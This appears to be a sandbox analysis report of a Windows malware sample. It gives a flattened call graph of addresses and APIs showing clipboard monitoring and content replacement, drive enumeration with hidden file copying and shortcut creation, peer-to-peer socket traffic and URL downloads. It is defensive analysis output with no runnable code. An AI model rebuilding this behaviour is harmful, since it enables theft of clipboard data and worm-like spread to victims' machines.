40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5184->5221 5187 40af8a strstr 5187->5160 5187->5174 5188 40afcb strstr 5188->5160 5189 40afdb 5188->5189 5220 40aa20 inet_ntoa 5189->5220 5192 40b13a LeaveCriticalSection 5192->5160 5193->5192 5195 409d90 7 API calls 5193->5195 5194 40afe9 strstr 5194->5160 5194->5183 5196 40b085 5195->5196 5196->5192 5222 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5196->5222 5198 40b0a3 5199 40b0d0 5198->5199 5200 40b0c6 Sleep 5198->5200 5202 40b0f5 5198->5202 5201 40a1b0 _invalid_parameter 3 API calls 5199->5201 5200->5198 5201->5202 5202->5192 5223 40ab80 5202->5223 5204->4480 5206 40ab80 13 API calls 5205->5206 5207 40ab73 LeaveCriticalSection 5206->5207 5207->4474 5209 40adf7 gethostbyname 5208->5209 5210 40ae13 5208->5210 5209->5210 5210->5160 5211 40aa20 inet_ntoa 5210->5211 5211->5162 5212->5165 5213->5170 5214->5180 5215->5171 5216->5178 5217->5187 5218->5179 5219->5188 5220->5194 5221->5193 5222->5198 5224 40ab94 5223->5224 5225 40ab8f 5223->5225 5226 409fa0 __aligned_recalloc_base 7 API calls 5224->5226 5225->5192 5228 40aba8 5226->5228 5227 40ac04 CreateFileW 5229 40ac53 InterlockedExchange 5227->5229 5230 40ac27 WriteFile FlushFileBuffers 5227->5230 5228->5225 5228->5227 5231 40a1b0 _invalid_parameter 3 API calls 5229->5231 5230->5229 5231->5225 5233 40d25d 5232->5233 5234 40d193 5233->5234 5235 40d281 WaitForSingleObject 5233->5235 5234->4487 5234->4488 5235->5233 5239 407490 5236->5239 5237 4074b8 Sleep 5237->5239 5238 40756a Sleep 5238->5239 5239->5237 5239->5238 5240 4074e7 Sleep wsprintfA DeleteUrlCacheEntry 5239->5240 5242 40eae0 56 API calls 5239->5242 5266 40ea30 InternetOpenA 5240->5266 5242->5239 5244 405889 memset GetModuleHandleW 5243->5244 5245 4058c2 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5244->5245 5245->5245 5246 405900 CreateWindowExW 5245->5246 5247 40592b 5246->5247 5248 40592d GetMessageA 5246->5248 5249 40595f ExitThread 5247->5249 5250 405941 TranslateMessage 
DispatchMessageA 5248->5250 5251 405957 5248->5251 5250->5248 5251->5244 5251->5249 5273 40e770 CreateFileW 5252->5273 5254 406d48 ExitThread 5256 406bf0 5256->5254 5257 406d38 Sleep 5256->5257 5258 406c29 5256->5258 5276 4063a0 GetLogicalDrives 5256->5276 5257->5256 5282 4062c0 5258->5282 5261 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5262 406cd6 wsprintfW 5261->5262 5263 406ceb wsprintfW 5261->5263 5262->5263 5288 4066b0 _chkstk 5263->5288 5265 406c5b 5267 40ea56 InternetOpenUrlA 5266->5267 5268 40eac8 Sleep 5266->5268 5269 40ea75 HttpQueryInfoA 5267->5269 5270 40eabe InternetCloseHandle 5267->5270 5268->5239 5271 40eab4 InternetCloseHandle 5269->5271 5272 40ea9e 5269->5272 5270->5268 5271->5270 5272->5271 5274 40e7b8 5273->5274 5275 40e79f GetFileSize 5273->5275 5274->5256 5275->5274 5281 4063cd 5276->5281 5277 406446 5277->5256 5278 4063dc RegOpenKeyExW 5279 4063fe RegQueryValueExW 5278->5279 5278->5281 5280 40643a RegCloseKey 5279->5280 5279->5281 5280->5281 5281->5277 5281->5278 5281->5280 5283 406319 5282->5283 5284 4062dc 5282->5284 5283->5261 5283->5265 5325 406320 GetDriveTypeW 5284->5325 5287 40630b lstrcpyW 5287->5283 5289 4066ce 6 API calls 5288->5289 5301 4066c7 5288->5301 5290 406782 5289->5290 5291 4067c4 PathFileExistsW 5289->5291 5294 40e770 2 API calls 5290->5294 5292 406874 PathFileExistsW 5291->5292 5293 4067d9 PathFileExistsW 5291->5293 5297 406885 5292->5297 5298 4068ca FindFirstFileW 5292->5298 5295 406809 PathFileExistsW 5293->5295 5296 4067ea SetFileAttributesW DeleteFileW 5293->5296 5299 40678e 5294->5299 5302 40681a CreateDirectoryW 5295->5302 5303 40683c PathFileExistsW 5295->5303 5296->5295 5304 4068a5 5297->5304 5305 40688d 5297->5305 5298->5301 5323 4068f1 5298->5323 5299->5291 5300 4067a5 SetFileAttributesW DeleteFileW 5299->5300 5300->5291 5301->5265 5302->5303 5308 40682d SetFileAttributesW 5302->5308 5303->5292 5309 40684d CopyFileW 5303->5309 5306 406460 3 API calls 5304->5306 5330 406460 CoInitialize 
CoCreateInstance 5305->5330 5311 4068a0 SetFileAttributesW 5306->5311 5307 4069b3 lstrcmpW 5312 4069c9 lstrcmpW 5307->5312 5307->5323 5308->5303 5309->5292 5313 406865 SetFileAttributesW 5309->5313 5311->5298 5312->5323 5313->5292 5315 406b8a FindNextFileW 5315->5307 5316 406ba6 FindClose 5315->5316 5316->5301 5317 406a0f lstrcmpiW 5317->5323 5318 406a76 PathMatchSpecW 5320 406a97 wsprintfW SetFileAttributesW DeleteFileW 5318->5320 5318->5323 5319 406af4 PathFileExistsW 5321 406b0a wsprintfW wsprintfW 5319->5321 5319->5323 5320->5323 5322 406b74 MoveFileExW 5321->5322 5321->5323 5322->5315 5323->5307 5323->5315 5323->5317 5323->5318 5323->5319 5334 406570 CreateDirectoryW wsprintfW FindFirstFileW 5323->5334 5326 4062ff 5325->5326 5327 406348 5325->5327 5326->5283 5326->5287 5327->5326 5328 40635c QueryDosDeviceW 5327->5328 5328->5326 5329 406376 StrCmpNW 5328->5329 5329->5326 5331 406496 5330->5331 5333 4064d2 5330->5333 5332 4064a0 wsprintfW 5331->5332 5331->5333 5332->5333 5333->5311 5335 4065c5 lstrcmpW 5334->5335 5336 40669f 5334->5336 5337 4065f1 5335->5337 5338 4065db lstrcmpW 5335->5338 5336->5323 5340 40666c FindNextFileW 5337->5340 5338->5337 5339 4065f3 wsprintfW wsprintfW 5338->5339 5339->5337 5341 406656 MoveFileExW 5339->5341 5340->5335 5342 406688 FindClose RemoveDirectoryW 5340->5342 5341->5340 5342->5336 5352 40d0d0 5357 401b60 5352->5357 5354 40d0e5 5355 40d104 5354->5355 5356 401b60 16 API calls 5354->5356 5356->5355 5358 401c42 5357->5358 5359 401b70 5357->5359 5358->5354 5359->5358 5360 409d90 7 API calls 5359->5360 5361 401b9d 5360->5361 5361->5358 5362 40a220 8 API calls 5361->5362 5363 401bc9 5362->5363 5364 401be6 5363->5364 5365 401bd6 5363->5365 5377 401ae0 WSASend 5364->5377 5367 40a1b0 _invalid_parameter 3 API calls 5365->5367 5368 401bdc 5367->5368 5368->5354 5369 401bf3 5370 401c33 5369->5370 5371 401bfc EnterCriticalSection 5369->5371 5374 40a1b0 _invalid_parameter 3 API calls 5370->5374 5372 401c13 5371->5372 5373 401c1f 
LeaveCriticalSection 5371->5373 5372->5373 5373->5354 5375 401c3c 5374->5375 5376 40a1b0 _invalid_parameter 3 API calls 5375->5376 5376->5358 5378 401b50 5377->5378 5379 401b12 WSAGetLastError 5377->5379 5378->5369 5379->5378 5380 401b1f 5379->5380 5381 401b56 5380->5381 5382 401b26 Sleep WSASend 5380->5382 5381->5369 5382->5378 5382->5379 5383 40d4d0 5386 40b570 5383->5386 5394 40b581 5386->5394 5388 40b59f 5390 40a1b0 _invalid_parameter 3 API calls 5388->5390 5391 40b94f 5390->5391 5392 40b960 21 API calls 5392->5394 5394->5388 5394->5392 5396 40b520 13 API calls 5394->5396 5397 40ae80 31 API calls 5394->5397 5400 40bab0 5394->5400 5407 40b250 EnterCriticalSection 5394->5407 5412 406e90 5394->5412 5417 406f30 5394->5417 5422 406d60 5394->5422 5429 406e60 5394->5429 5396->5394 5397->5394 5401 40bac1 lstrlenA 5400->5401 5402 40c190 7 API calls 5401->5402 5406 40badf 5402->5406 5403 40baeb 5404 40bb6f 5403->5404 5405 40a1b0 _invalid_parameter 3 API calls 5403->5405 5404->5394 5405->5404 5406->5401 5406->5403 5408 40b268 5407->5408 5409 40b2a4 LeaveCriticalSection 5408->5409 5432 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5408->5432 5409->5394 5411 40b293 5411->5409 5433 406ed0 5412->5433 5415 40d160 16 API calls 5416 406ec9 5415->5416 5416->5394 5418 406ed0 75 API calls 5417->5418 5419 406f4f 5418->5419 5420 406f7c 5419->5420 5448 406f90 5419->5448 5420->5394 5459 405fa0 EnterCriticalSection 5422->5459 5424 406dad 5424->5394 5425 406d7a 5425->5424 5464 406dc0 5425->5464 5428 40a1b0 _invalid_parameter 3 API calls 5428->5424 5471 406060 EnterCriticalSection 5429->5471 5431 406e82 5431->5394 5432->5411 5434 406ee3 5433->5434 5436 406ea4 5434->5436 5437 405eb0 EnterCriticalSection 5434->5437 5436->5415 5436->5416 5438 40c820 71 API calls 5437->5438 5439 405ece 5438->5439 5440 405f8b LeaveCriticalSection 5439->5440 5441 405ee7 5439->5441 5443 405f08 5439->5443 5440->5434 5442 405ef1 memcpy 5441->5442 5447 405f06 5441->5447 5442->5447 5446 405f66 memcpy 5443->5446 
5443->5447 5444 40a1b0 _invalid_parameter 3 API calls 5445 405f88 5444->5445 5445->5440 5446->5447 5447->5444 5451 40b480 5448->5451 5452 40bf00 3 API calls 5451->5452 5453 40b48b 5452->5453 5454 40b4a7 lstrlenA 5453->5454 5455 40c190 7 API calls 5454->5455 5456 40b4dd 5455->5456 5457 406fd5 5456->5457 5458 40a1b0 _invalid_parameter 3 API calls 5456->5458 5457->5420 5458->5457 5460 405fbe 5459->5460 5461 40604a LeaveCriticalSection 5460->5461 5462 40a220 8 API calls 5460->5462 5461->5425 5463 40601c 5462->5463 5463->5461 5465 409fa0 __aligned_recalloc_base 7 API calls 5464->5465 5466 406dd2 memcpy 5465->5466 5467 40b480 13 API calls 5466->5467 5468 406e3c 5467->5468 5469 40a1b0 _invalid_parameter 3 API calls 5468->5469 5470 406da1 5469->5470 5470->5428 5496 40c880 5471->5496 5474 4062a3 LeaveCriticalSection 5474->5431 5475 40c820 71 API calls 5476 406099 5475->5476 5476->5474 5477 4061b8 5476->5477 5478 4060f4 memcpy 5476->5478 5479 4061e1 5477->5479 5480 405cf0 68 API calls 5477->5480 5481 40a1b0 _invalid_parameter 3 API calls 5478->5481 5482 40a1b0 _invalid_parameter 3 API calls 5479->5482 5480->5479 5483 406118 5481->5483 5484 406202 5482->5484 5485 40a220 8 API calls 5483->5485 5484->5474 5486 406211 CreateFileW 5484->5486 5487 406128 5485->5487 5486->5474 5488 406234 5486->5488 5489 40a1b0 _invalid_parameter 3 API calls 5487->5489 5491 406251 WriteFile 5488->5491 5492 40628f FlushFileBuffers 5488->5492 5490 40614f 5489->5490 5493 40c190 7 API calls 5490->5493 5491->5488 5492->5474 5494 406185 5493->5494 5495 407310 64 API calls 5494->5495 5495->5477 5499 40bdd0 5496->5499 5504 40bde1 5499->5504 5500 40a220 8 API calls 5500->5504 5501 40bd30 70 API calls 5501->5504 5502 40a1b0 _invalid_parameter 3 API calls 5503 406082 5502->5503 5503->5474 5503->5475 5504->5500 5504->5501 5505 407af0 68 API calls 5504->5505 5506 40bdfb 5504->5506 5507 40be3b memcmp 5504->5507 5505->5504 5506->5502 5507->5504 5507->5506 5508 40cf50 5509 40cfbe 5508->5509 5510 40cf66 5508->5510 
5510->5509 5511 40cf70 5510->5511 5512 40cfc3 5510->5512 5513 40d013 5510->5513 5514 409d90 7 API calls 5511->5514 5516 40cfe8 5512->5516 5517 40cfdb InterlockedDecrement 5512->5517 5542 40bbc0 5513->5542 5518 40cf7d 5514->5518 5519 40a1b0 _invalid_parameter 3 API calls 5516->5519 5517->5516 5531 4023d0 5518->5531 5521 40cff4 5519->5521 5523 40a1b0 _invalid_parameter 3 API calls 5521->5523 5523->5509 5525 40d039 5525->5509 5528 40d071 IsBadReadPtr 5525->5528 5530 40b570 184 API calls 5525->5530 5547 40bcc0 5525->5547 5527 40cfab InterlockedIncrement 5527->5509 5528->5525 5530->5525 5532 402413 5531->5532 5533 4023d9 5531->5533 5535 40ad40 5532->5535 5533->5532 5534 4023ea InterlockedIncrement 5533->5534 5534->5532 5536 40add0 2 API calls 5535->5536 5537 40ad4f 5536->5537 5538 40ad59 5537->5538 5539 40ad5d EnterCriticalSection 5537->5539 5538->5509 5538->5527 5540 40ad7c LeaveCriticalSection 5539->5540 5540->5538 5543 40bbd3 5542->5543 5544 40bbfd memcpy 5542->5544 5545 409fe0 9 API calls 5543->5545 5544->5525 5546 40bbf4 5545->5546 5546->5544 5548 40bce9 5547->5548 5549 40bcde 5547->5549 5548->5549 5550 40bd01 memmove 5548->5550 5549->5525 5550->5549 5551 401f50 GetQueuedCompletionStatus 5552 401f92 5551->5552 5553 402008 5551->5553 5554 401f97 WSAGetOverlappedResult 5552->5554 5558 401d60 5552->5558 5554->5552 5555 401fb9 WSAGetLastError 5554->5555 5555->5552 5557 401fd3 GetQueuedCompletionStatus 5557->5552 5557->5553 5559 401ef2 InterlockedDecrement setsockopt closesocket 5558->5559 5560 401d74 5558->5560 5562 401e39 5559->5562 5560->5559 5561 401d7c 5560->5561 5578 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5561->5578 5562->5557 5564 401d81 InterlockedExchange 5565 401d98 5564->5565 5566 401e4e 5564->5566 5565->5562 5571 401da9 InterlockedDecrement 5565->5571 5572 401dbc InterlockedDecrement InterlockedExchangeAdd 5565->5572 5567 401e67 5566->5567 5568 401e57 InterlockedDecrement 5566->5568 5569 401e72 5567->5569 5570 401e87 InterlockedDecrement 
5567->5570 5568->5557 5573 401ae0 4 API calls 5569->5573 5574 401ee9 5570->5574 5571->5557 5575 401e2f 5572->5575 5576 401e7e 5573->5576 5574->5557 5579 401cf0 5575->5579 5576->5557 5578->5564 5580 401d00 InterlockedExchangeAdd 5579->5580 5581 401cfc 5579->5581 5582 401d53 5580->5582 5583 401d17 InterlockedIncrement 5580->5583 5581->5562 5582->5562 5587 401c50 WSARecv 5583->5587 5585 401d46 5585->5582 5586 401d4c InterlockedDecrement 5585->5586 5586->5582 5588 401cd2 5587->5588 5589 401c8e 5587->5589 5588->5585 5590 401c90 WSAGetLastError 5589->5590 5591 401ca4 Sleep WSARecv 5589->5591 5592 401cdb 5589->5592 5590->5588 5590->5589 5591->5588 5591->5590 5592->5585 5593 40d550 5603 4013b0 5593->5603 5595 40d5dd 5597 40d55d 5597->5595 5598 40d577 InterlockedExchangeAdd 5597->5598 5599 40d5bb WaitForSingleObject 5597->5599 5615 40b200 EnterCriticalSection 5597->5615 5620 40b520 5597->5620 5598->5597 5598->5599 5599->5597 5600 40d5d4 5599->5600 5623 401330 5600->5623 5604 409d90 7 API calls 5603->5604 5605 4013bb CreateEventA socket 5604->5605 5606 4013f2 5605->5606 5610 4013f8 5605->5610 5607 401330 7 API calls 5606->5607 5607->5610 5608 401401 bind 5611 401444 CreateThread 5608->5611 5612 401434 5608->5612 5609 401462 5609->5597 5610->5608 5610->5609 5611->5609 5633 401100 5611->5633 5613 401330 7 API calls 5612->5613 5614 40143a 5613->5614 5614->5597 5616 40b237 LeaveCriticalSection 5615->5616 5617 40b21f 5615->5617 5616->5597 5618 40bec0 3 API calls 5617->5618 5619 40b22a 5618->5619 5619->5616 5621 40b480 13 API calls 5620->5621 5622 40b561 5621->5622 5622->5597 5624 401339 5623->5624 5632 40139b 5623->5632 5625 401341 SetEvent WaitForSingleObject 5624->5625 5624->5632 5628 401362 5625->5628 5626 40138b 5662 40ab40 shutdown closesocket 5626->5662 5628->5626 5629 40a1b0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5628->5629 5629->5628 5630 401395 5631 40a1b0 _invalid_parameter 3 API calls 5630->5631 5631->5632 5632->5595 5634 401115 ioctlsocket 
5633->5634 5635 4011e4 5634->5635 5641 40113a 5634->5641 5636 40a1b0 _invalid_parameter 3 API calls 5635->5636 5638 4011ea 5636->5638 5637 4011cd WaitForSingleObject 5637->5634 5637->5635 5639 409fe0 9 API calls 5639->5641 5640 401168 recvfrom 5640->5637 5640->5641 5641->5637 5641->5639 5641->5640 5642 4011ad InterlockedExchangeAdd 5641->5642 5644 401000 5642->5644 5645 401014 5644->5645 5646 40103b 5645->5646 5647 409d90 7 API calls 5645->5647 5655 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5646->5655 5647->5646 5649 40105b 5656 401580 5649->5656 5651 4010ec 5651->5641 5652 4010a3 IsBadReadPtr 5654 401071 5652->5654 5653 4010d8 memmove 5653->5654 5654->5651 5654->5652 5654->5653 5655->5649 5657 401592 5656->5657 5658 4015a5 memcpy 5656->5658 5659 409fe0 9 API calls 5657->5659 5661 4015c1 5658->5661 5660 40159f 5659->5660 5660->5658 5661->5654 5662->5630 5887 40ca90 5888 40ad40 4 API calls 5887->5888 5889 40caa3 5888->5889 5890 40caba 5889->5890 5892 40cad0 InterlockedExchangeAdd 5889->5892 5893 40caed 5892->5893 5903 40cae6 5892->5903 5909 40cdc0 5893->5909 5896 40cb0d InterlockedIncrement 5906 40cb17 5896->5906 5897 40b520 13 API calls 5897->5906 5898 40cb40 5916 40aa20 inet_ntoa 5898->5916 5900 40cb4c 5901 40cc10 InterlockedDecrement 5900->5901 5917 40ab40 shutdown closesocket 5901->5917 5903->5890 5904 409fa0 __aligned_recalloc_base 7 API calls 5904->5906 5905 40ccf0 6 API calls 5905->5906 5906->5897 5906->5898 5906->5901 5906->5904 5906->5905 5907 40a1b0 _invalid_parameter 3 API calls 5906->5907 5908 40b570 184 API calls 5906->5908 5907->5906 5908->5906 5910 40cdcd socket 5909->5910 5911 40cde2 htons connect 5910->5911 5912 40ce3f 5910->5912 5911->5912 5913 40ce2a 5911->5913 5912->5910 5914 40cafd 5912->5914 5918 40ab40 shutdown closesocket 5913->5918 5914->5896 5914->5903 5916->5900 5917->5903 5918->5914 5919 406c16 5922 406bf8 5919->5922 5920 406d38 Sleep 5920->5922 5921 406c29 5923 4062c0 4 API calls 5921->5923 5922->5920 5922->5921 5924 406d48 
ExitThread 5922->5924 5925 4063a0 4 API calls 5922->5925 5927 406c3a 5923->5927 5925->5922 5926 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5929 406cd6 wsprintfW 5926->5929 5930 406ceb wsprintfW 5926->5930 5927->5926 5928 406c5b 5927->5928 5929->5930 5931 4066b0 51 API calls 5930->5931 5931->5928 5932 40b420 5933 40b423 WaitForSingleObject 5932->5933 5934 40b451 5933->5934 5935 40b43b InterlockedDecrement 5933->5935 5936 40b44a 5935->5936 5936->5933 5937 40ab60 15 API calls 5936->5937 5937->5936 5938 401920 GetTickCount WaitForSingleObject 5939 401ac9 5938->5939 5940 40194d WSAWaitForMultipleEvents 5938->5940 5941 4019f0 GetTickCount 5940->5941 5942 40196a WSAEnumNetworkEvents 5940->5942 5943 401a43 GetTickCount 5941->5943 5944 401a05 EnterCriticalSection 5941->5944 5942->5941 5958 401983 5942->5958 5945 401ab5 WaitForSingleObject 5943->5945 5946 401a4e EnterCriticalSection 5943->5946 5947 401a16 5944->5947 5948 401a3a LeaveCriticalSection 5944->5948 5945->5939 5945->5940 5949 401aa1 LeaveCriticalSection GetTickCount 5946->5949 5950 401a5f InterlockedExchangeAdd 5946->5950 5953 401a29 LeaveCriticalSection 5947->5953 5980 401820 5947->5980 5948->5945 5949->5945 5998 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5950->5998 5951 401992 accept 5951->5941 5951->5958 5953->5945 5955 401a72 5955->5949 5955->5950 5999 40ab40 shutdown closesocket 5955->5999 5958->5941 5958->5951 5959 401cf0 7 API calls 5958->5959 5960 4022c0 5958->5960 5959->5941 5961 4022d2 EnterCriticalSection 5960->5961 5962 4022cd 5960->5962 5963 4022e7 5961->5963 5964 4022fd LeaveCriticalSection 5961->5964 5962->5958 5963->5964 5965 402308 5964->5965 5966 40230f 5964->5966 5965->5958 5967 409d90 7 API calls 5966->5967 5968 402319 5967->5968 5969 402326 getpeername CreateIoCompletionPort 5968->5969 5970 4023b8 5968->5970 5972 4023b2 5969->5972 5973 402366 5969->5973 6002 40ab40 shutdown closesocket 5970->6002 5974 40a1b0 _invalid_parameter 3 API calls 5972->5974 6000 40d4a0 
NtQuerySystemTime RtlTimeToSecondsSince1980 5973->6000 5974->5970 5975 4023c3 5975->5958 5977 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6001 4021e0 EnterCriticalSection LeaveCriticalSection 5977->6001 5979 4023ab 5979->5958 5981 401830 5980->5981 5990 40190f 5980->5990 5982 40183d InterlockedExchangeAdd 5981->5982 5981->5990 5983 401854 5982->5983 5982->5990 5984 401880 5983->5984 5983->5990 6003 4017a0 EnterCriticalSection 5983->6003 5988 401891 5984->5988 6012 40ab40 shutdown closesocket 5984->6012 5986 4018a7 InterlockedDecrement 5991 401901 5986->5991 5988->5986 5988->5991 5989 402247 5989->5948 5990->5948 5991->5989 5992 402265 EnterCriticalSection 5991->5992 5993 40229c LeaveCriticalSection DeleteCriticalSection 5992->5993 5996 40227d 5992->5996 5994 40a1b0 _invalid_parameter 3 API calls 5993->5994 5994->5989 5995 40a1b0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5995->5996 5996->5995 5997 40229b 5996->5997 5997->5993 5998->5955 5999->5955 6000->5977 6001->5979 6002->5975 6004 401807 LeaveCriticalSection 6003->6004 6005 4017ba InterlockedExchangeAdd 6003->6005 6004->5983 6006 4017ca LeaveCriticalSection 6005->6006 6007 4017d9 6005->6007 6006->5983 6008 40a1b0 _invalid_parameter 3 API calls 6007->6008 6009 4017fe 6008->6009 6010 40a1b0 _invalid_parameter 3 API calls 6009->6010 6011 401804 6010->6011 6011->6004 6012->5988 6013 40d520 6016 401200 6013->6016 6015 40d542 6017 401314 6016->6017 6018 40121d 6016->6018 6017->6015 6018->6017 6019 409fa0 __aligned_recalloc_base 7 API calls 6018->6019 6020 401247 memcpy htons 6019->6020 6021 4012ed 6020->6021 6022 401297 sendto 6020->6022 6023 40a1b0 _invalid_parameter 3 API calls 6021->6023 6024 4012b6 InterlockedExchangeAdd 6022->6024 6025 4012e9 6022->6025 6027 4012fc 6023->6027 6024->6022 6028 4012cc 6024->6028 6025->6021 6026 40130a 6025->6026 6029 40a1b0 _invalid_parameter 3 API calls 6026->6029 6027->6015 6030 40a1b0 _invalid_parameter 3 API calls 6028->6030 
6029->6017 6031 4012db 6030->6031 6031->6015 6032 40e121 6034 40e12a 6032->6034 6033 40e21d 6034->6033 6035 40e193 lstrcmpiW 6034->6035 6036 40e213 SysFreeString 6035->6036 6037 40e1a6 6035->6037 6036->6033 6038 40df10 2 API calls 6037->6038 6040 40e1b4 6038->6040 6039 40e205 6039->6036 6040->6036 6040->6039 6041 40e1e3 lstrcmpiW 6040->6041 6042 40e1f5 6041->6042 6043 40e1fb SysFreeString 6041->6043 6042->6043 6043->6039 5677 405970 GetWindowLongW 5678 405994 5677->5678 5679 4059b6 5677->5679 5680 4059a1 5678->5680 5681 405a27 IsClipboardFormatAvailable 5678->5681 5683 405a06 5679->5683 5684 4059ee SetWindowLongW 5679->5684 5695 4059b1 5679->5695 5687 4059c4 SetClipboardViewer SetWindowLongW 5680->5687 5688 4059a7 5680->5688 5685 405a43 IsClipboardFormatAvailable 5681->5685 5686 405a3a 5681->5686 5682 405ba4 DefWindowProcA 5689 405a0c SendMessageA 5683->5689 5683->5695 5684->5695 5685->5686 5690 405a58 IsClipboardFormatAvailable 5685->5690 5692 405a75 OpenClipboard 5686->5692 5711 405b3c 5686->5711 5687->5682 5691 405b5d RegisterRawInputDevices ChangeClipboardChain 5688->5691 5688->5695 5689->5695 5690->5686 5691->5682 5694 405a85 GetClipboardData 5692->5694 5692->5711 5693 405b45 SendMessageA 5693->5695 5694->5695 5696 405a9d GlobalLock 5694->5696 5695->5682 5696->5695 5697 405ab5 5696->5697 5698 405ac8 5697->5698 5699 405ae9 5697->5699 5700 405afe 5698->5700 5701 405ace 5698->5701 5702 405690 13 API calls 5699->5702 5718 4057b0 5700->5718 5703 405ad4 GlobalUnlock CloseClipboard 5701->5703 5712 405570 5701->5712 5702->5703 5707 405b27 5703->5707 5703->5711 5726 404970 lstrlenW 5707->5726 5710 40a1b0 _invalid_parameter 3 API calls 5710->5711 5711->5693 5711->5695 5713 40557b 5712->5713 5714 405581 lstrlenW 5713->5714 5715 405594 5713->5715 5716 409fa0 __aligned_recalloc_base 7 API calls 5713->5716 5717 4055b1 lstrcpynW 5713->5717 5714->5713 5714->5715 5715->5703 5716->5713 5717->5713 5717->5715 5723 4057bd 5718->5723 5719 4057c3 lstrlenA 5719->5723 5724 4057d6 
5719->5724 5720 405630 2 API calls 5720->5723 5721 409fa0 __aligned_recalloc_base 7 API calls 5721->5723 5723->5719 5723->5720 5723->5721 5723->5724 5725 40a1b0 _invalid_parameter 3 API calls 5723->5725 5760 405760 5723->5760 5724->5703 5725->5723 5727 4049a4 5726->5727 5729 404c00 5727->5729 5735 404d30 StrStrW 5727->5735 5756 404bee 5727->5756 5728 404dbb StrStrW 5730 404dd2 StrStrW 5728->5730 5731 404dce 5728->5731 5729->5728 5729->5756 5732 404de5 5730->5732 5733 404de9 StrStrW 5730->5733 5731->5730 5732->5733 5734 404dfc 5733->5734 5742 404e12 5734->5742 5765 4048a0 lstrlenW 5734->5765 5735->5729 5737 404d58 StrStrW 5735->5737 5737->5729 5738 404d80 StrStrW 5737->5738 5738->5729 5739 40539b StrStrW 5740 4053b7 StrStrW 5739->5740 5746 4053ae StrStrW 5739->5746 5741 4053d3 StrStrW 5740->5741 5740->5746 5741->5746 5742->5739 5742->5746 5742->5756 5744 405470 StrStrW 5747 405483 5744->5747 5748 40548a StrStrW 5744->5748 5745 405469 5745->5744 5746->5744 5746->5745 5747->5748 5749 4054a4 StrStrW 5748->5749 5750 40549d 5748->5750 5751 4054b7 5749->5751 5752 4054be StrStrW 5749->5752 5750->5749 5751->5752 5753 4054d1 5752->5753 5754 4054d8 lstrlenA 5752->5754 5753->5754 5755 4054eb GlobalAlloc 5754->5755 5754->5756 5755->5756 5757 405506 GlobalLock 5755->5757 5756->5710 5757->5756 5758 405519 memcpy GlobalUnlock OpenClipboard 5757->5758 5758->5756 5759 405546 EmptyClipboard SetClipboardData CloseClipboard 5758->5759 5759->5756 5761 40576b 5760->5761 5762 405771 lstrlenA 5761->5762 5763 405630 2 API calls 5761->5763 5764 4057a4 5761->5764 5762->5761 5763->5761 5764->5723 5768 4048c4 5765->5768 5766 40490d 5766->5742 5767 404911 iswalpha 5767->5768 5769 40492c iswdigit 5767->5769 5768->5766 5768->5767 5768->5769 5769->5768 5770 40d5f0 5776 401470 5770->5776 5772 40d604 5773 40d615 WaitForSingleObject 5772->5773 5775 40d62f 5772->5775 5774 401330 7 API calls 5773->5774 5774->5775 5777 401483 5776->5777 5778 401572 5776->5778 5777->5778 5779 409d90 7 API calls 5777->5779 
5778->5772 5780 401498 CreateEventA socket 5779->5780 5781 4014d5 5780->5781 5782 4014cf 5780->5782 5781->5778 5784 4014e2 htons setsockopt bind 5781->5784 5783 401330 7 API calls 5782->5783 5783->5781 5785 401546 5784->5785 5786 401558 CreateThread 5784->5786 5787 401330 7 API calls 5785->5787 5786->5778 5789 401100 20 API calls _invalid_parameter 5786->5789 5788 40154c 5787->5788 5788->5772 6044 40cc30 6049 40cc90 6044->6049 6047 40cc5e 6048 40cc90 send 6048->6047 6050 40cca1 send 6049->6050 6051 40cc43 6050->6051 6052 40ccbe 6050->6052 6051->6047 6051->6048 6052->6050 6052->6051 6053 40ceb0 6054 40ceb4 6053->6054 6055 40b200 5 API calls 6054->6055 6056 40ced0 WaitForSingleObject 6054->6056 6057 40cad0 198 API calls 6054->6057 6058 40cef5 6054->6058 6055->6054 6056->6054 6056->6058 6057->6054 5790 40ee74 5791 40ee7c 5790->5791 5792 40ef30 5791->5792 5796 40f0b1 5791->5796 5795 40eeb5 5795->5792 5800 40ef9c RtlUnwind 5795->5800 5798 40f0c6 5796->5798 5799 40f0e2 5796->5799 5797 40f151 NtQueryVirtualMemory 5797->5799 5798->5797 5798->5799 5799->5795 5801 40efb4 5800->5801 5801->5795 6059 406a39 6061 4069df 6059->6061 6060 406a0f lstrcmpiW 6060->6061 6061->6060 6062 406b8a FindNextFileW 6061->6062 6063 406a76 PathMatchSpecW 6061->6063 6066 406af4 PathFileExistsW 6061->6066 6072 406570 11 API calls 6061->6072 6064 4069b3 lstrcmpW 6062->6064 6065 406ba6 FindClose 6062->6065 6063->6061 6067 406a97 wsprintfW SetFileAttributesW DeleteFileW 6063->6067 6064->6061 6068 4069c9 lstrcmpW 6064->6068 6069 406bb3 6065->6069 6066->6061 6070 406b0a wsprintfW wsprintfW 6066->6070 6067->6061 6068->6061 6070->6061 6071 406b74 MoveFileExW 6070->6071 6071->6062 6072->6061 5802 40757a ExitThread 5803 40ee7c 5804 40ee9a 5803->5804 5806 40ef30 5803->5806 5805 40f0b1 NtQueryVirtualMemory 5804->5805 5808 40eeb5 5805->5808 5807 40ef9c RtlUnwind 5807->5808 5808->5806 5808->5807 5809 405f7d 5810 405f11 5809->5810 5811 405f7b 5810->5811 5814 405f66 memcpy 5810->5814 5812 40a1b0 
_invalid_parameter 3 API calls 5811->5812 5813 405f88 LeaveCriticalSection 5812->5813 5814->5811

Control-flow Graph

APIs
• Sleep.KERNELBASE(00000BB8), ref: 0040759E
• CreateMutexA.KERNELBASE(00000000,00000000,753f85d83d), ref: 004075AD
• GetLastError.KERNEL32 ref: 004075B9
• ExitProcess.KERNEL32 ref: 004075C8
• GetModuleFileNameW.KERNEL32(00000000,00416268,00000105), ref: 00407602
• PathFindFileNameW.SHLWAPI(00416268), ref: 0040760D
